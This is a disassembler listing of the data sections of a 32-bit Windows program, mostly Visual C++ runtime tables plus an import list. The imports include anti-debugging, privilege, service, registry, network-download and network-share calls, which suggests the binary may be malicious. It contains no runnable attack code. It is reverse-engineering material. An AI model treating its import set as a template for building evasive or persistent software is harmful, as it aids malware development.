dword_421840 dd 0FFFFFFFEh, 0 ; DATA XREF: __fcloseall+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset $LN13_11
align 10h
dword_421860 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40E6B0+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E749
align 10h
dword_421880 dd 0FFFFFFFEh, 0 ; DATA XREF: ___lock_fhandle+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN14_9
align 10h
dword_4218A0 dd 0FFFFFFFEh, 0 ; DATA XREF: __alloc_osfhnd+2�o
dd 0FFFFFFC8h, 0
dd 0FFFFFFFEh, 0
dd offset $LN31_0
dd 2 dup(0)
dd offset $LN48_0
dword_4218C8 dd 0FFFFFFFEh, 0 ; DATA XREF: __commit+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset $LN16_4
align 8
dword_4218E8 dd 0FFFFFFFEh, 0 ; DATA XREF: _has_osfxsr_set+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40F7A6h, 40F7C2h, 0
dword_421908 dd 0FFFFFFFEh, 0 ; DATA XREF: ___set_fpsr_sse2+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 410107h, 410123h, 0
dd offset off_425918
align 10h
dd 0FFFFFFFFh, 0
dd 28h, 4013CEh, 0
dd offset off_425938
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 4013E6h, 0
dd offset off_425958
align 8
dd 0FFFFFFFFh, 0
dword_421970 dd 0Ch, 402C72h, 3, 421924h, 421940h, 42195Ch ; DATA XREF: .rdata:00421994�o
dword_421988 dd 0 ; DATA XREF: sub_40121E+48�o
; sub_4016BA+48�o ...
dd offset sub_4010E1
dd 0
dd offset dword_421970+8
dd 0
dd offset off_425974
dd 0
dd 0FFFFFFFFh, 0
dword_4219AC dd 0Ch, 401637h, 2, 421998h, 42195Ch ; DATA XREF: .rdata:004219CC�o
dword_4219C0 dd 0 ; DATA XREF: std::_Allocate<char>(uint,char *)+34�o
; operator new(uint)+54�o
dd offset sub_401038
dd 0
dd offset dword_4219AC+8
dword_4219D0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_419760+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 5 dup(0)
dd 0FFFFFFFFh, 41C26Ah
dword_421A00 dd 19930522h, 1, 4219F8h, 5 dup(0) ; DATA XREF: .text:0041C285�o
dd 1, 0FFFFFFFFh, 41C28Fh
dword_421A2C dd 19930522h, 1, 421A24h, 5 dup(0) ; DATA XREF: .text:0041C2AA�o
dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 0
dd 40h, 2 dup(0)
dd offset unknown_libname_5 ; Microsoft VisualC 2-8/net runtime
dd 40h, 2 dup(0)
dd offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
dd 2 dup(2), 3, 1, 421A70h, 2 dup(0)
dd 3, 1, 421A80h
dword_421AB8 dd 19930522h, 4, 421A50h, 2, 421A90h, 3 dup(0) ; DATA XREF: sub_41C209+11�o
dd 1, 0
dd 0FFFFFFFFh, 41C224h
dword_421AE8 dd 19930522h, 1, 421AE0h, 5 dup(0) ; DATA XREF: .text:0041C23D�o
dd 1, 0
dd 0FFFFFFFFh, 41C247h
dword_421B18 dd 19930522h, 1, 421B10h, 5 dup(0) ; DATA XREF: .text:0041C260�o
dd 1, 0
dd 0FFFFFFFFh, 41C2B4h
dword_421B48 dd 19930522h, 1, 421B40h, 5 dup(0) ; DATA XREF: .text:0041C2CD�o
dd 1, 0
dd 0FFFFFFFFh, 41C2D7h
dword_421B78 dd 19930522h, 1, 421B70h, 5 dup(0) ; DATA XREF: .text:0041C2FC�o
dd 1, 0
dd 0FFFFFFFFh, 41C306h
dword_421BA8 dd 19930522h, 1, 421BA0h, 5 dup(0) ; DATA XREF: .text:0041C331�o
dd 1, 0
dd 0FFFFFFFFh, 41C33Bh
dword_421BD8 dd 19930522h, 1, 421BD0h, 5 dup(0) ; DATA XREF: .text:0041C366�o
dd 1, 21D00h, 2 dup(0)
dd 2222Ch, 1D050h, 21E9Ch, 2 dup(0)
dd 222D2h, 1D1ECh, 21CB0h, 2 dup(0)
dd 2243Ah, 1D000h, 21E94h, 2 dup(0)
dd 22458h, 1D1E4h, 21E7Ch, 2 dup(0)
dd 22464h, 1D1CCh, 21ED4h, 2 dup(0)
dd 22470h, 1D224h, 21EC4h, 2 dup(0)
dd 224B4h, 1D214h, 21E74h, 2 dup(0)
dd 224D6h, 1D1C4h, 5 dup(0)
dd 22418h, 22406h, 223F2h, 223E0h, 223D2h, 223BAh, 223ACh
dd 2239Ah, 2238Ah, 22378h, 22360h, 22350h, 2233Eh, 22326h
dd 22314h, 22304h, 222EEh, 222DEh, 2242Ah, 0
dd 220AEh, 220BCh, 220CEh, 220E8h, 220FAh, 22110h, 2212Ch
dd 2213Ch, 2214Ah, 22158h, 2216Ah, 22176h, 2218Ch, 22198h
dd 221A8h, 221B4h, 2209Ah, 221D2h, 221E4h, 221FAh, 2220Ah
dd 22220h, 22842h, 22832h, 2281Ch, 2280Ch, 227F8h, 227E8h
dd 22088h, 22074h, 22064h, 22050h, 22042h, 22032h, 22022h
dd 22014h, 21FFEh, 21FEAh, 21FDAh, 21FC8h, 21FB8h, 21FA2h
dd 21F8Eh, 21F86h, 21F74h, 21F60h, 21F50h, 21F44h, 221C2h
dd 21F38h, 227D6h, 227C6h, 227AAh, 22798h, 22786h, 22776h
dd 22766h, 2274Ch, 22736h, 2271Ch, 22704h, 226EAh, 226DCh
dd 226CCh, 226BAh, 226ACh, 2269Ch, 2268Eh, 22680h, 22672h
dd 2265Ah, 22642h, 2262Ah, 2261Ah, 22610h, 22602h, 225F6h
dd 225E8h, 225DCh, 225D2h, 224DEh, 224EAh, 22500h, 2251Ch
dd 2253Ah, 22554h, 22566h, 22578h, 2258Ah, 22596h, 225A2h
dd 225BAh, 0
dd 224C0h, 0
dd 8000000Bh, 8000001Fh, 80000018h, 80000029h, 8000004Bh
dd 0
dd 22448h, 0
dd 222C2h, 222A0h, 22294h, 22280h, 2226Eh, 2225Ch, 22248h
dd 222B4h, 2223Ah, 0
dd 22490h, 2247Ch, 224A4h, 0
dd 80000003h, 80000013h, 80000065h, 8000000Dh, 80000001h
dd 80000006h, 80000034h, 80000004h, 80000074h, 80000005h
dd 80000014h, 80000015h, 8000000Fh, 80000012h, 80000011h
dd 8000000Ch, 8000000Bh, 8000000Ah, 80000002h, 80000010h
dd 80000073h, 80000009h, 80000017h, 80000033h, 0
dd 65480210h, 6C417061h, 636F6Ch, 65480216h, 72467061h
dd 6565h, 654701DFh, 63695474h, 756F436Bh, 746Eh, 65470145h
dd 72754374h, 746E6572h, 65726854h, 6461h, 654701A3h, 6F725074h
dd 73736563h, 70616548h, 3560000h, 65656C53h, 35E0070h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 1C10000h
aGetsystemdirec db 'GetSystemDirectoryA',0
dd 65470171h, 73614C74h, 72724574h, 726Fh, 654701A0h, 6F725074h
dd 64644163h, 73736572h, 2520000h, 64616F4Ch, 7262694Ch
dd 41797261h, 17F0000h, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 1460000h
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
a4 db '4',0
aClosehandle db 'CloseHandle',0
dw 358h
aSuspendthread db 'SuspendThread',0
dw 2D2h
aResumethread db 'ResumeThread',0
align 2
aG db 'ƒ',0
aDeletefilea db 'DeleteFileA',0
db 42h ; B
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
dd 69560384h, 61757472h, 6572466Ch, 784565h, 69560387h
dd 61757472h, 6F72506Ch, 74636574h, 7845h, 69560382h, 61757472h
dd 6C6C416Ch, 7845636Fh, 2390000h
aIsdebuggerpres db 'IsDebuggerPresent',0
db '¹',0
aExitprocess db 'ExitProcess',0
dd 65470174h, 636F4C74h, 49656C61h, 416F666Eh, 2A30000h
aQueryperforman db 'QueryPerformanceCounter',0
aF db 'f',0
aCreateprocessa db 'CreateProcessA',0
align 2
dw 17Dh
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 10h
db 0A4h ; ¤
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
dd 654701E9h, 72655674h, 6E6F6973h, 417845h, 72430053h
dd 65746165h, 656C6946h, 1630041h, 46746547h, 53656C69h
dd 657A69h, 6553031Bh, 6C694674h, 696F5065h, 7265746Eh
dd 2B50000h, 64616552h, 656C6946h, 3900000h
aWaitforsingleo db 'WaitForSingleObject',0
aC_0 db 'C',0
aCopyfilea db 'CopyFileA',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 0A4h ; ¤
db 3, 57h, 72h
aItefile db 'iteFile',0
db 'º',0
aExitthread db 'ExitThread',0
align 2
aO db 'o',0
aCreatethread db 'CreateThread',0
align 2
dw 35Fh
aTerminatethrea db 'TerminateThread',0
db 4
db 2, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
aO_0 db 'O',0
aCreateeventa db 'CreateEventA',0
align 2
dw 275h
aMultibytetowid db 'MultiByteToWideChar',0
dd 736C03CCh, 656C7274h, 416Eh, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 1BA0000h, 64616F4Ch, 73727543h, 41726Fh, 694400A1h
dd 74617073h, 654D6863h, 67617373h, 4165h, 6544008Eh, 6E695766h
dd 50776F64h, 41636F72h, 600000h, 61657243h, 69576574h
dd 776F646Eh, 417845h, 725402AAh, 6C736E61h, 4D657461h
dd 61737365h, 6567h, 6F4C01BEh, 63496461h, 416E6Fh, 65520217h
dd 74736967h, 6C437265h, 45737361h, 4178h, 6547013Ah, 73654D74h
dd 65676173h, 10B0041h, 43746547h, 6F737275h, 736F5072h
dd 53550000h, 32335245h, 6C6C642Eh, 1AF0000h, 6E65704Fh
dd 76726553h, 41656369h, 3E0000h
aCloseserviceha db 'CloseServiceHandle',0
align 4
aP db '¯',0
aDeleteservice db 'DeleteService',0
dd 704F01B1h, 68546E65h, 64616572h, 656B6F54h, 14F006Eh
aLookupprivileg db 'LookupPrivilegeValueA',0
dw 132h
aImpersonatesel db 'ImpersonateSelf',0
db 0ECh ; ì
db 1, 52h, 65h
aGopenkeyexa db 'gOpenKeyExA',0
db 0C4h ; Ä
db 1, 51h, 75h
aEryservicestat db 'eryServiceStatusEx',0
align 4
dd 704F01ADh, 43536E65h, 616E614Dh, 41726567h, 1E10000h
dd 45676552h, 566D756Eh, 65756C61h, 420041h, 746E6F43h
dd 536C6F72h, 69767265h, 6563h, 655201DDh, 756E4567h, 79654B6Dh
dd 1C0041h
aAdjusttokenpri db 'AdjustTokenPrivileges',0
dw 1CBh
aRegclosekey db 'RegCloseKey',0
db 4
db 2, 52h, 65h
aGsetvalueexa db 'gSetValueExA',0
align 2
dw 1F7h
aRegqueryvaluee db 'RegQueryValueExA',0
align 2
dw 1D1h
aRegcreatekeyex db 'RegCreateKeyExA',0
db 0D8h ; Ø
db 1, 52h, 65h
aGdeletevaluea db 'gDeleteValueA',0
dw 124h
aGetusernamea db 'GetUserNameA',0
align 2
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
db 7
db 1, 53h, 68h
aEllexecutea db 'ellExecuteA',0
aShell32_dll db 'SHELL32.dll',0
aOdbc32_dll db 'ODBC32.dll',0
align 10h
aWs2_32_dll db 'WS2_32.dll',0
align 4
aU db '“',0
aInternetopenur db 'InternetOpenUrlA',0
align 10h
db 'š',0
aInternetreadfi db 'InternetReadFile',0
align 4
aT db '’',0
aInternetopena db 'InternetOpenA',0
aWininet_dll db 'WININET.dll',0
db 6
align 2
aWnetaddconnect db 'WNetAddConnection2A',0
aMpr_dll db 'MPR.dll',0
dw 21Ch
aHeapsize db 'HeapSize',0
align 2
dw 143h
aGetcurrentproc db 'GetCurrentProcessId',0
db 6Eh ; n
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
db 4Ah ; J
db 3, 53h, 65h
aTunhandledexce db 'tUnhandledExceptionFilter',0
dw 1CAh
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
dd 65470110h, 6D6F4374h, 646E616Dh, 656E694Ch, 1B70041h
dd 53746547h, 74726174h, 6E497075h, 416F66h, 615202A7h
dd 45657369h, 70656378h, 6E6F6974h, 2D70000h, 556C7452h
dd 6E69776Eh, 1040064h, 43746547h, 666E4950h, 22C006Fh
aInterlockedinc db 'InterlockedIncrement',0
align 2
dw 228h
aInterlockeddec db 'InterlockedDecrement',0
align 2
dw 0FDh
aGetacp db 'GetACP',0
align 4
dd 65470193h, 4D454F74h, 5043h, 6C540365h, 74654773h, 756C6156h
dd 3630065h, 41736C54h, 636F6C6Ch, 3660000h, 53736C54h
dd 61567465h, 65756Ch, 6C540364h, 65724673h, 3280065h
dd 4C746553h, 45747361h, 726F7272h, 810000h
aDeletecritical db 'DeleteCriticalSection',0
dw 251h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aS_20 db '˜',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 214h
aHeapdestroy db 'HeapDestroy',0
dd 65480212h, 72437061h, 65746165h, 3830000h, 74726956h
dd 466C6175h, 656572h, 69560381h, 61757472h, 6C6C416Ch
dd 636Fh, 6548021Ah, 65527061h, 6F6C6C41h, 3240063h, 48746553h
dd 6C646E61h, 756F4365h, 746Eh, 654701B9h, 64745374h, 646E6148h
dd 656Ch, 65470166h, 6C694674h, 70795465h, 0F60065h
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 55h ; U
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 0F7h ; ÷
align 2
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 394h
aWidechartomult db 'WideCharToMultiByte',0
db 57h ; W
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 244h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 245h
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1BAh
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701BDh, 72745374h, 54676E69h, 57657079h, 2230000h
aInitializecr_0 db 'InitializeCriticalSection',0
dw 122h
aGetconsolecp db 'GetConsoleCP',0
align 2
dw 133h
aGetconsolemode db 'GetConsoleMode',0
align 4
db 37h ; 7
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
aU_0 db 'î',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
db 99h ; ™
db 3, 57h, 72h
aIteconsolea db 'iteConsoleA',0
db 35h ; 5
db 1, 47h, 65h
aTconsoleoutput db 'tConsoleOutputCP',0
align 2
dw 3A3h
aWriteconsolew db 'WriteConsoleW',0
dw 310h
aSetendoffile db 'SetEndOfFile',0
align 2
_rdata ends
; Section 3. (virtual address 00023000)
; Virtual size : 00011DFC ( 73212.)
; Section size in file : 00011DFC ( 73212.)
; Offset to raw data for section: 00023000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 423000h
dd offset aBadAllocation ; "bad allocation"
dd offset aBadAllocation ; "bad allocation"
off_423008 dd offset off_41D38C ; DATA XREF: .rdata:00420D94�o
; .rdata:00420DBC�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
dd offset aBadAllocation ; "bad allocation"
dd offset aBadAllocation ; "bad allocation"
off_423030 dd offset off_41D38C ; DATA XREF: .rdata:00420DF8�o
; .rdata:00420E18�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
off_423048 dd offset aBadAllocation ; DATA XREF: std::bad_alloc::bad_alloc(void)+3�o
; "bad allocation"
align 10h
dword_423050 dd 2 ; DATA XREF: __NMSG_WRITE+42�r
; __FF_MSGBANNER+19�r ...
align 10h
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
dword_423064 dd 70C954E6h ; DATA XREF: sub_401C1D+9�r
; sub_401CC0+C�r ...
dword_423068 dd 8F36AB19h ; DATA XREF: ___report_gsfailure+AE�r
; ___security_init_cookie+29�w ...
align 10h
dword_423070 dd 0FFFFFFFFh, 16h dup(0) ; DATA XREF: setSBCS(threadmbcinfostruct *)+29�o
; ___updatetmbcinfo+63�o ...
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 31h dup(0)
dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
dd 76757473h, 7A797877h, 0
db 0
align 2
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
align 4
dd 21h dup(0)
byte_423290 db 0 ; DATA XREF: __setmbcp+102�w
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h, 0
byte_423398 db 0 ; DATA XREF: __setmbcp+11E�w
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
; void *Memory
Memory dd 9B2980h ; DATA XREF: _LocaleUpdate::_LocaleUpdate(localeinfo_struct *)+41�r
; ___updatetmbcinfo+4C�r ...
byte_42349C db 1 ; DATA XREF: __setmbcp_nolock+E3�r
db 2, 4, 8
dword_4234A0 dd 3A4h ; DATA XREF: __setmbcp_nolock:loc_404AFA�r
dword_4234A4 dd 82798260h ; DATA XREF: __setmbcp_nolock+12B�r
dd 21h, 0
dword_4234B0 dd 0DFA6h ; DATA XREF: __setmbcp_nolock+C6�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dd offset dword_41DF40+4
dword_423594 dd 0FFFFFFFEh ; DATA XREF: _LocaleUpdate::_LocaleUpdate(localeinfo_struct *)+2C�r
; _LocaleUpdate::_LocaleUpdate(localeinfo_struct *)+4C�r ...
dword_423598 dd 43h, 0 ; DATA XREF: ___freetlocinfo:loc_404F1E�o
; ___addlocaleref:loc_404FAC�o ...
dword_4235A0 dd 2, 15h dup(0) ; DATA XREF: __updatetlocinfoEx_nolock+28�o
; _freefls(x)+DA�o ...
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd 2 dup(1), 3 dup(0)
dd offset off_423F38
dd 2 dup(0)
off_423668 dd offset asc_41DD40 ; DATA XREF: _isdigit+D�r _isxdigit+D�r ...
; " ((((( H"
dd offset dword_41E148+80h
dd offset dword_41E148+200h
dd offset off_423E78
off_423678 dd offset dword_4235A0 ; DATA XREF: _LocaleUpdate::_LocaleUpdate(localeinfo_struct *)+24�r
; ___updatetlocinfo+4E�r ...
dd 1
off_423680 dd offset dword_4235A0 ; DATA XREF: _strtol+17�o
dd offset dword_423070
dword_423688 dd 0Eh ; DATA XREF: __encode_pointer+13�r
; __decode_pointer+13�r ...
dword_42368C dd 0Dh ; DATA XREF: __encode_pointer+1�r
; __encode_pointer+1E�r ...
dword_423690 dd 1 ; DATA XREF: __get_errno_from_oserr:loc_40579E�r
dword_423694 dd 16h ; DATA XREF: __get_errno_from_oserr:loc_4057B9�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4237F8 dd 0Ch ; DATA XREF: __errno+9�o
dword_4237FC dd 8 ; DATA XREF: ___doserrno+9�o
off_423800 dd offset dword_425E18 ; DATA XREF: __mtinitlocks:loc_4058BE�w
; __mtdeletelocks+8�o ...
dword_423804 dd 1 ; DATA XREF: __mtinitlocks:loc_40588A�r
dd offset dword_425E30
dd 1, 2 dup(0)
dd offset dword_425E48
dd 1, 425E60h, 1, 2 dup(0)
dd offset dword_425E78
dd 1, 425E90h, 1, 425EA8h, 1, 2 dup(0)
dd offset dword_425EC0
dd 1, 9B44F0h, 0
dd offset dword_425ED8
dd 1, 425EF0h, 1, 425F08h, 1, 2 dup(0)
dd offset dword_425F20
dd 1, 425F38h, 1, 425F50h, 1, 9B44D0h, 21h dup(0)
dword_423920 dd 10h ; DATA XREF: __mtdeletelocks+2A�o
; __mtdeletelocks+4A�o
; char *Str
Str dd offset aNull ; DATA XREF: __output_l:loc_406EC5�r
; __output_l+7E7�r
; "(null)"
off_423928 dd offset aNull_0 ; DATA XREF: __output_l+433�r
; "(null)"
align 10h
off_423930 dd offset __exit ; DATA XREF: __amsg_exit+E�r
; __init_pointers+45�w
dd 3 dup(0)
dd offset aBadAllocation ; "bad allocation"
align 10h
off_423950 dd offset dword_433DC0 ; DATA XREF: sub_408084�o
; ___initstdio+52�o ...
align 8
dd offset dword_433DC0
dd 101h
dword_423960 dd 0FFFFFFFEh, 0 ; DATA XREF: ___initstdio+74�o
dd 1000h, 4 dup(0)
dd 2, 0FFFFFFFEh, 6 dup(0)
dd 2, 0FFFFFFFEh, 7 dup(0)
dword_4239C0 dd 3, 0 ; DATA XREF: ___initstdio+A4�o
dd 1000h, 79h dup(0)
dword_423BB0 dd 8 dup(0) ; DATA XREF: __lock_file+D�o
; __unlock_file+D�o
dword_423BD0 dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA XREF: _fprintf:loc_4032A3�o
; _fprintf:loc_4032E8�o ...
dword_423C00 dd 2 ; DATA XREF: __NMSG_WRITE:loc_409AC0�r
; char *off_423C04
off_423C04 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE:loc_409BE4�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41DA94h, 9, 41DA68h, 0Ah, 41D9D0h, 10h, 41D9A4h
dd 11h, 41D974h, 12h, 41D950h, 13h, 41D924h, 18h, 41D8ECh
dd 19h, 41D8C4h, 1Ah, 41D88Ch, 1Bh, 41D854h, 1Ch, 41D82Ch
dd 1Eh, 41D80Ch, 1Fh, 41D7A8h, 20h, 41D770h, 21h, 41D678h
dd 22h, 41D5D8h, 78h, 41D5C8h, 79h, 41D5B8h, 7Ah, 41D5A8h
dd 0FCh, 41D5A4h, 0FFh, 41D594h
byte_423CB8 db 0 ; DATA XREF: __read_nolock:loc_40A10E�r
; __read_nolock+36F�r
align 4
dd 2Fh dup(0)
dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2 dup(0)
dword_423DB8 dd 1B3Fh ; DATA XREF: __floor_default+D�r
align 10h
dword_423DC0 dd 0C0000005h, 0Bh, 0 ; DATA XREF: __initptd+1D�o
; _freefls(x)+6E�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_423E38 dd 3 ; DATA XREF: __XcptFilter+A1�r
; __XcptFilter+C0�r ...
dword_423E3C dd 7 ; DATA XREF: __XcptFilter+A7�r
; __XcptFilter+C6�r ...
dd 78h
dword_423E44 dd 0Ah ; DATA XREF: __XcptFilter+22�r
; _siglookup+4�r
dd offset aBadAllocation ; "bad allocation"
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
off_423E50 dd offset off_41D38C ; DATA XREF: unknown_libname_104+128�o
; .rdata:00420E40�o ...
align 8
a_?avbad_except db '.?AVbad_exception@std@@',0
dd offset asc_41DD40 ; " ((((( H"
dd offset dword_41DF40+2
off_423E78 dd offset aSun ; DATA XREF: ___freetlocinfo+D9�o
; .data:00423674�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset dword_41E148+300h
dd 409h, 2 dup(1), 423E78h
dword_423F34 dd 2Eh ; DATA XREF: .data:off_423F38�o
off_423F38 dd offset dword_423F34 ; DATA XREF: ___freetlocinfo+14�o
; ___free_lconv_num+B�r ...
off_423F3C dd offset dword_426418 ; DATA XREF: ___free_lconv_num+1D�r
off_423F40 dd offset dword_426418 ; DATA XREF: ___free_lconv_num+2F�r
off_423F44 dd offset dword_426418 ; DATA XREF: ___free_lconv_mon+C�r
off_423F48 dd offset dword_426418 ; DATA XREF: ___free_lconv_mon+1E�r
off_423F4C dd offset dword_426418 ; DATA XREF: ___free_lconv_mon+30�r
off_423F50 dd offset dword_426418 ; DATA XREF: ___free_lconv_mon+42�r
off_423F54 dd offset dword_426418 ; DATA XREF: ___free_lconv_mon+54�r
off_423F58 dd offset dword_426418 ; DATA XREF: ___free_lconv_mon+66�r
off_423F5C dd offset dword_426418 ; DATA XREF: ___free_lconv_mon+78�r
dd 2 dup(7F7F7F7Fh), 423F38h, 1, 2Eh, 1, 2 dup(0)
off_423F80 dd offset __cfltcvt ; DATA XREF: __initp_misc_cfltcvt_tab:loc_40D5A2�r
; __cfltcvt_init+5�w
off_423F84 dd offset __cropzeros ; DATA XREF: __cfltcvt_init+A�w
off_423F88 dd offset __fassign ; DATA XREF: __cfltcvt_init+14�w
off_423F8C dd offset __forcdecpt ; DATA XREF: __cfltcvt_init+1E�w
off_423F90 dd offset __positive ; DATA XREF: __cfltcvt_init+28�w
off_423F94 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+32�w
off_423F98 dd offset __cfltcvt_l ; DATA XREF: __output_l+61A�r
; __cfltcvt_init+37�w
off_423F9C dd offset __fassign_l ; DATA XREF: __input_l+5F1�r
; __cfltcvt_init+41�w
off_423FA0 dd offset __cropzeros_l ; DATA XREF: __output_l+65F�r
; __cfltcvt_init+4B�w
off_423FA4 dd offset __forcdecpt_l ; DATA XREF: __output_l+640�r
; __cfltcvt_init+55�w
align 10h
dword_423FB0 dd 19930520h, 3 dup(0) ; DATA XREF: __NLG_Notify1+2�o
; __NLG_Notify+2�o
dword_423FC0 dd 2694h ; DATA XREF: __handle_qnan1+3�r
; __except1+5D�r
dd 9875h, 9873h, 0
